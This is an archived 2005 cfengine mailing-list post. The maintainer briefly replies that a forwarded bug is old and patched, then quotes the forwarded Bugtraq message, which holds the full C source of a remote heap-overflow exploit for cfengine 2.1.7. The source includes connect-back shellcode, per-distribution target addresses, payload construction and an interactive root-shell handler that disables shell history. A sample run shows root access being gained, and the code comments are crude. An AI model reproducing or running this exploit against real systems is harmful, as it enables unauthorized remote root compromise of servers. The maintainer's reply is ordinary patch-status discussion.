[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: cfengine rsa heap remote exploit: part of PTjob project (fwd)
|
From: |
Mark Burgess |
|
Subject: |
Re: cfengine rsa heap remote exploit: part of PTjob project (fwd) |
|
Date: |
Mon, 21 Feb 2005 08:15:07 +0100 |
This is not enough information to go on. Where does this come from and
when did it appear? It appears to be old. (2.1.7). In that case it
refers to a bug that was patched in 2.1.8. More information please.
Mark
On Mon, 2005-02-21 at 16:37 +1100, Tim Nelson wrote:
> I presume most of you saw this, but I'm forwarding it just in
> case.
>
> :)
>
> --
> Tim Nelson
> Server Administrator
> WebAlive Technologies Global
> Level 1 Innovation Building, Digital Harbour
> 1010 LaTrobe Street
> Docklands, Melbourne,
> Vic, 3008
> Phone: +61 3 9934 0812
> Fax: +61 3 9934 0899
> E-mail: tim.nelson@webalive.biz
> http://www.webalive.biz/
>
> "Your Business, Your Web, Your Control"
>
> ---------- Forwarded message ----------
> Date: 19 Feb 2005 13:16:50 -0000
> From: yan feng <jsk@ph4nt0m.net>
> To: bugtraq@securityfocus.com
> Subject: cfengine rsa heap remote exploit: part of PTjob project
>
>
>
>
> /* _ ________ _____ ______
> *
> * cfengine rsa heap remote exploit part of PTjob project / \ / "fuck mm"
> * by jsk:exworm(http://exworm.hostrocket.com) \/
> * bug found by core
> * yep ta mei dayong ..hehe..so pub it..
> * my home: www.ph4nt0m.org
> * GT: emm.oyxin.seal.ava.haggis.b_root.more..
> * No girl No money No jop...
> * bash-2.05b# ./cf_0day -t 1 -h 192.168.31.23
> * cfengine rsa heap remote exploit ....s
> * --------------------------------------------------(need
> money.to..fk..girl..)
> * [+] lisntener...
> * [+] Connected, sending code...
> * [+] Ret: 0x0819f03e
> * [+] Got: 0x0811a590
> * [+] ownedbyOseen!
> * -----------------------------------------------------------
> * Linux ns2.autson.com 2.4.18-3 #1 Thu Apr 18 07:37:53 EDT 2002 i686 unknown
> * uid=0(root) gid=0(root)
> groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10
> *(wheel)
> *
> *
> */
>
> #include <stdio.h>
> #include <stdarg.h>
> #include <stdlib.h>
> #include <netdb.h>
> #include <net/if.h>
> #include <netinet/in.h>
> #include <sys/types.h>
> #include <sys/socket.h>
> #include <sys/ioctl.h>
> #include <sys/time.h>
> #include <netinet/in.h>
> #include <getopt.h>
> #include <unistd.h>
> #include <string.h>
> #include <arpa/inet.h>
> #include <errno.h>
> #include <linux/sockios.h>
>
> #define BUF 1024
>
>
> struct {
> char *distro;
> char *type;
> unsigned long ret;
> unsigned long got;
>
> } targets[] = { /*got is free of rsafree() ,get it by yourself to own more
> machine ;) */
> { "Redhat 7.3 ", "cfengine 2.1.7p1 ",0x0819f03e , 0x0811a590 },
> { "redhat 9.0 ", "cfengine 2.1.7p1", **********, ********** }, (
> hehe:use fast-bin tips)
> { "Redhat 7.2 ", "cfengine 2.17p1 ", 0x080d1c78, 0x0806d0e3 },
> { "Redhat 7.1 ", "cfengine 2.17p1", 0x080d11e0, 0x082bc090 },
> { "Crash ", "(All platforms) ", 0x42424242, 0x41414141 },
> };
> char linux_connect_back[] = /* connect back 45295 */
> "\x31\xc0\x31\xdb\x31\xc9\x51\xb1"
> "\x06\x51\xb1\x01\x51\xb1\x02\x51"
> "\x89\xe1\xb3\x01\xb0\x66\xcd\x80"
> "\x89\xc2\x31\xc0\x31\xc9\x51\x51"
> "\x68\x41\x42\x43\x44\x66\x68\xb0"
> "\xef\xb1\x02\x66\x51\x89\xe7\xb3"
> "\x10\x53\x57\x52\x89\xe1\xb3\x03"
> "\xb0\x66\xcd\x80\x31\xc9\x39\xc1"
> "\x74\x06\x31\xc0\xb0\x01\xcd\x80"
> "\x31\xc0\xb0\x3f\x89\xd3\xcd\x80"
> "\x31\xc0\xb0\x3f\x89\xd3\xb1\x01"
> "\xcd\x80\x31\xc0\xb0\x3f\x89\xd3"
> "\xb1\x02\xcd\x80\x31\xc0\x31\xd2"
> "\x50\x68\x6e\x2f\x73\x68\x68\x2f"
> "\x2f\x62\x69\x89\xe3\x50\x53\x89"
> "\xe1\xb0\x0b\xcd\x80\x31\xc0\xb0"
> "\x01\xcd\x80";
> int sock;
> void usage();
> void shell();
>
>
>
>
> void
> usage(char *prog)
> {
>
> fprintf(stderr,"Usage: %s -t [-pah]\n",prog);
> fprintf(stderr,"-t version Linux version.\n");
> fprintf(stderr,"-h target The host to attack.\n");
> fprintf(stderr,"-a password Default password is \"sorry no
> password. \".\n");
> fprintf(stderr,"-p port Default port is 5803.\n\n");
> }
>
> int
> openhost(char *host,int port)
> {
> struct sockaddr_in addr;
> struct hostent *he;
>
> he=gethostbyname(host);
>
> if (he==NULL) return -1;
> sock=socket(AF_INET, SOCK_STREAM, getprotobyname("tcp")->p_proto);
> if (sock==-1) return -1;
>
> memcpy(&addr.sin_addr, he->h_addr, he->h_length);
>
> addr.sin_family=AF_INET;
> addr.sin_port=htons(port);
>
> if(connect(sock, (struct sockaddr *)&addr, sizeof(addr)) == -1)
> sock=-1;
> return sock;
> }
>
>
> void
> shell(int sock)
> {
> fd_set fd_read;
> char buff[1024], *cmd="unset HISTFILE; /bin/uname -a;/usr/bin/id;
> echo '*** oseen are chinese...'\n";
> int n;
>
> FD_ZERO(&fd_read);
> FD_SET(sock, &fd_read);
> FD_SET(0, &fd_read);
>
> send(sock, cmd, strlen(cmd), 0);
>
> while(1) {
> FD_SET(sock, &fd_read);
> FD_SET(0, &fd_read);
>
> if (select(sock+1, &fd_read, NULL, NULL, NULL) < 0) break;
>
> if (FD_ISSET(sock, &fd_read)) {
> if ((n = recv(sock, buff, sizeof(buff), 0)) < 0){
> fprintf(stderr, "[+] EOF\n");
> exit(2);
> }
>
> if (write(1, buff, n) <0) break;
> }
>
> if (FD_ISSET(0, &fd_read)) {
> if ((n = read(0, buff, sizeof(buff))) < 0){
> fprintf(stderr,"[+] EOF\n");
> exit(2);
> }
>
> if (send(sock, buff, n, 0) < 0) break;
> }
> }
>
> fprintf(stderr,"[+] Connection lost.\n\n");
> exit(0);
> }
>
> unsigned char
> *get_my_ip_addr(int sockfd, struct ifreq *ifr)
> {
> struct sockaddr_in sin;
> char *b = (char *) malloc(4);
>
> if (ioctl(sockfd ,SIOCGIFADDR,ifr) < 0) {
> fprintf(stderr, "Unable to get the local IP Address, use
> -d.\n");
> exit(1);
> }
>
> memcpy(&sin, &ifr->ifr_addr, sizeof(struct sockaddr_in));
> memcpy(b, (char *) &sin.sin_addr.s_addr, 4);
> return b;
> }
>
>
>
>
>
> int
> main (int argc,char *argv[])
> {
> char buf1[512];
> char buf2[512];
> char host[256];
> char pass[256]="changeme";
> char data;
>
>
>
> int type= 0;
> int c=0;
> int port=8001;
> char device[256] = "eth0";
> unsigned char *ptr;
>
> struct hostent *hp;
> struct sockaddr_in sin_listener;
> struct ifreq ifr;
> struct timeval timeout;
>
> fd_set fdread;
>
> int delay = 12;
> int i = 0;
> int mode = 0;
> int local_port = 0;
> int opt = 0;
> int ret = 0;
> int sin_len = sizeof (struct sockaddr_in);
> int sock = 0;
> int sock2 = 0;
> int sockd = 0;
> int listener = 0;
> int time_out = 4;
> int tmp = 0;
>
> srand(getpid());
>
> fprintf(stdout,"cfengine rsa heap remote exploit ....s\n");
>
> fprintf(stdout,"--------------------------------------------------(need
> money.to..fk..girl..)\n");
>
> while((c=getopt(argc,argv,"h:p:a:t:")) !=EOF)
> {
> switch(c)
> {
> case 'p':
> port=atoi(optarg);
> if ((port <= 0) || (port > 65535)) {
> fprintf(stderr,"Invalid port.\n\n");
> exit(1);
> }
> break;
> case 'a':
> memset(pass,0x0,sizeof(pass));
> strncpy(pass,optarg,sizeof(pass) - 1);
> break;
> case 't':
> type = atoi(optarg);
> if (type == 0 || type > sizeof(targets) /
> 28) {
> for(i = 0; i < sizeof(targets) / 28;
> i++)
> fprintf(stderr, "%02d. %s - %s
> [0x%08x - 0x%08x]\n",
> i + 1, targets[i].distro,
> targets[i].type, targets[i].ret, targets[i].got);
> return -1;
> }
> break;
> case 'h':
> memset(host,0x0,sizeof(host));
> strncpy(host,optarg,sizeof(host) - 1);
> break;
>
> default:
> usage(argv[0]);
> exit(1);
> break;
> }
> }
>
> timeout.tv_sec = time_out;
> timeout.tv_usec = 0;
>
> if (strlen(host) == 0) {
> usage(argv[0]);
> exit(1);
> }
> sock=openhost(host, 5308);
>
> if (sock==-1) {
> fprintf(stderr,"- Unable to connect.\n\n");
> exit(1);
> }
>
> strncpy(ifr.ifr_name, device, 15);
>
> if ((sockd = socket(AF_INET, SOCK_DGRAM, 17)) < 0) {
> fprintf(stderr, "socket() error.\n");
> return -1;
> }
>
> if ((listener = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) {
> fprintf(stderr, "socket() error.\n");
> return -1;
> }
>
> ptr = get_my_ip_addr(sockd, &ifr);
> memcpy(&sin_listener.sin_addr.s_addr, ptr, 4);
>
> sin_listener.sin_family = AF_INET;
> memset(&sin_listener.sin_zero, 0x00, 8);
>
> while(1) {
> local_port = local_port = 45295;
> sin_listener.sin_port = htons(local_port);
> if (!bind(listener, (struct sockaddr *) &sin_listener,
> sin_len)) break;
> }
>
>
>
> listen(listener, 1);
> fprintf(stdout, "[+] lisntener...\n");
> linux_connect_back[33] = (unsigned int) *(ptr + 0);
> linux_connect_back[34] = (unsigned int) *(ptr + 1);
> linux_connect_back[35] = (unsigned int) *(ptr + 2);
> linux_connect_back[36] = (unsigned int) *(ptr + 3);
>
>
>
> memset(buf2, 0x0, sizeof(buf2));
> memset(buf1, 0x90, sizeof(buf1));
>
> for(i=0;i < strlen(linux_connect_back); i++) buf1[i+50] =
> linux_connect_back[i];
>
> buf1[0] = (0x41414141 & 0x000000ff);
> buf1[1] = (0x41414141 & 0x0000ff00) >> 8;
> buf1[2] = (0x41414141 & 0x00ff0000) >> 16;
> buf1[3] = (0x41414141 & 0xff000000) >> 24;
>
> buf1[4] = (0x58585858 & 0x000000ff);
> buf1[5] = (0x58585858 & 0x0000ff00) >> 8;
> buf1[6] = (0x58585858 & 0x00ff0000) >> 16;
> buf1[7] = (0x58585858 & 0xff000000) >> 24;
>
> buf1[8] = (0xfffffffc & 0x000000ff);
> buf1[9] = (0xfffffffc & 0x0000ff00) >> 8;
> buf1[10] = (0xfffffffc & 0x00ff0000) >> 16;
> buf1[11] = (0xfffffffc & 0xff000000) >> 24;
>
> buf1[12] = (0xffffffff & 0x000000ff);
> buf1[13] = (0xffffffff & 0x0000ff00) >> 8;
> buf1[14] = (0xffffffff & 0x00ff0000) >> 16;
> buf1[15] = (0xffffffff & 0xff000000) >> 24;
>
> buf1[16] = (targets[type - 1].got -12 & 0x000000ff);
> buf1[17] = (targets[type - 1].got -12 & 0x0000ff00) >> 8;
> buf1[18] = (targets[type - 1].got -12 & 0x00ff0000) >> 16;
> buf1[19] = (targets[type - 1].got -12 & 0xff000000) >> 24;
>
> buf1[20] = (targets[type - 1].ret & 0x000000ff);
> buf1[21] = (targets[type - 1].ret & 0x0000ff00) >> 8;
> buf1[22] = (targets[type - 1].ret & 0x00ff0000) >> 16;
> buf1[23] = (targets[type - 1].ret & 0xff000000) >> 24;
>
>
> for(i = 0; i < 300 - sizeof(linux_connect_back) -80; i+=2)
> {
> buf1[i + 24] = 0x7f;
> buf1[i + 25] = 0xeb;
> }
> for(; i < 300 - sizeof(linux_connect_back) - 1; i++)
> buf1[i + 24] = 0x90;
> strcpy(buf1 + i + 24, linux_connect_back);
> buf1[i + 24+ sizeof(linux_connect_back) - 1] = '\n';
> buf1[i + 25 + sizeof(linux_connect_back) - 1] = '\0';
>
>
>
> sprintf(buf2, "k0000023CAUTH HARE KRISHNA HAREk0003000SAUTH
> n00000010 00001000%s\r\n", buf1);
>
> fprintf(stdout, "Connected, sending code...\n");
> fprintf(stdout, "[+] Ret: 0x%08x\n", targets[type - 1].ret);
> fprintf(stdout, "[+] Got: 0x%08x\n", targets[type - 1].got);
> while(1) {
> write(sock, buf2, strlen(buf2));
> close(sock);
> sleep(2);
> FD_ZERO(&fdread);
> FD_SET(listener, &fdread);
>
> timeout.tv_sec = time_out;
> timeout.tv_usec = 0;
>
> while(1) {
>
> ret = select(FD_SETSIZE, &fdread, NULL, NULL, &timeout);
>
> if (ret < 0) {
> close(sock);
> close(listener);
> fprintf(stderr, "select() error.\n");
> return -1;
> }
>
> if (ret == 0) {
> fprintf(stderr, "[+] Failed, waiting %d
> seconds.\n"
> "[+] Use ctrl-c to abort.\n",
> delay);
> sleep(delay);
> break;
> }
>
> if(FD_ISSET(listener, &fdread)) {
> sock2 = accept(listener, (struct sockaddr
> *)&sin_listener, &sin_len);
> close(sock);
> close(listener);
>
> fprintf(stderr, "[+] ownedbyOseen!\n"
>
> "-----------------------------------------------------------\n");
> shell(sock2);
> close(sock2);
> return 0;
> }
> }
>
> }
>
> fprintf(stderr, "[+] Exploit failed.\n");
> close(listener);
> close(sock);
> return 0;
>
> }
>
>
> _______________________________________________
> Help-cfengine mailing list
> Help-cfengine@gnu.org
> http://lists.gnu.org/mailman/listinfo/help-cfengine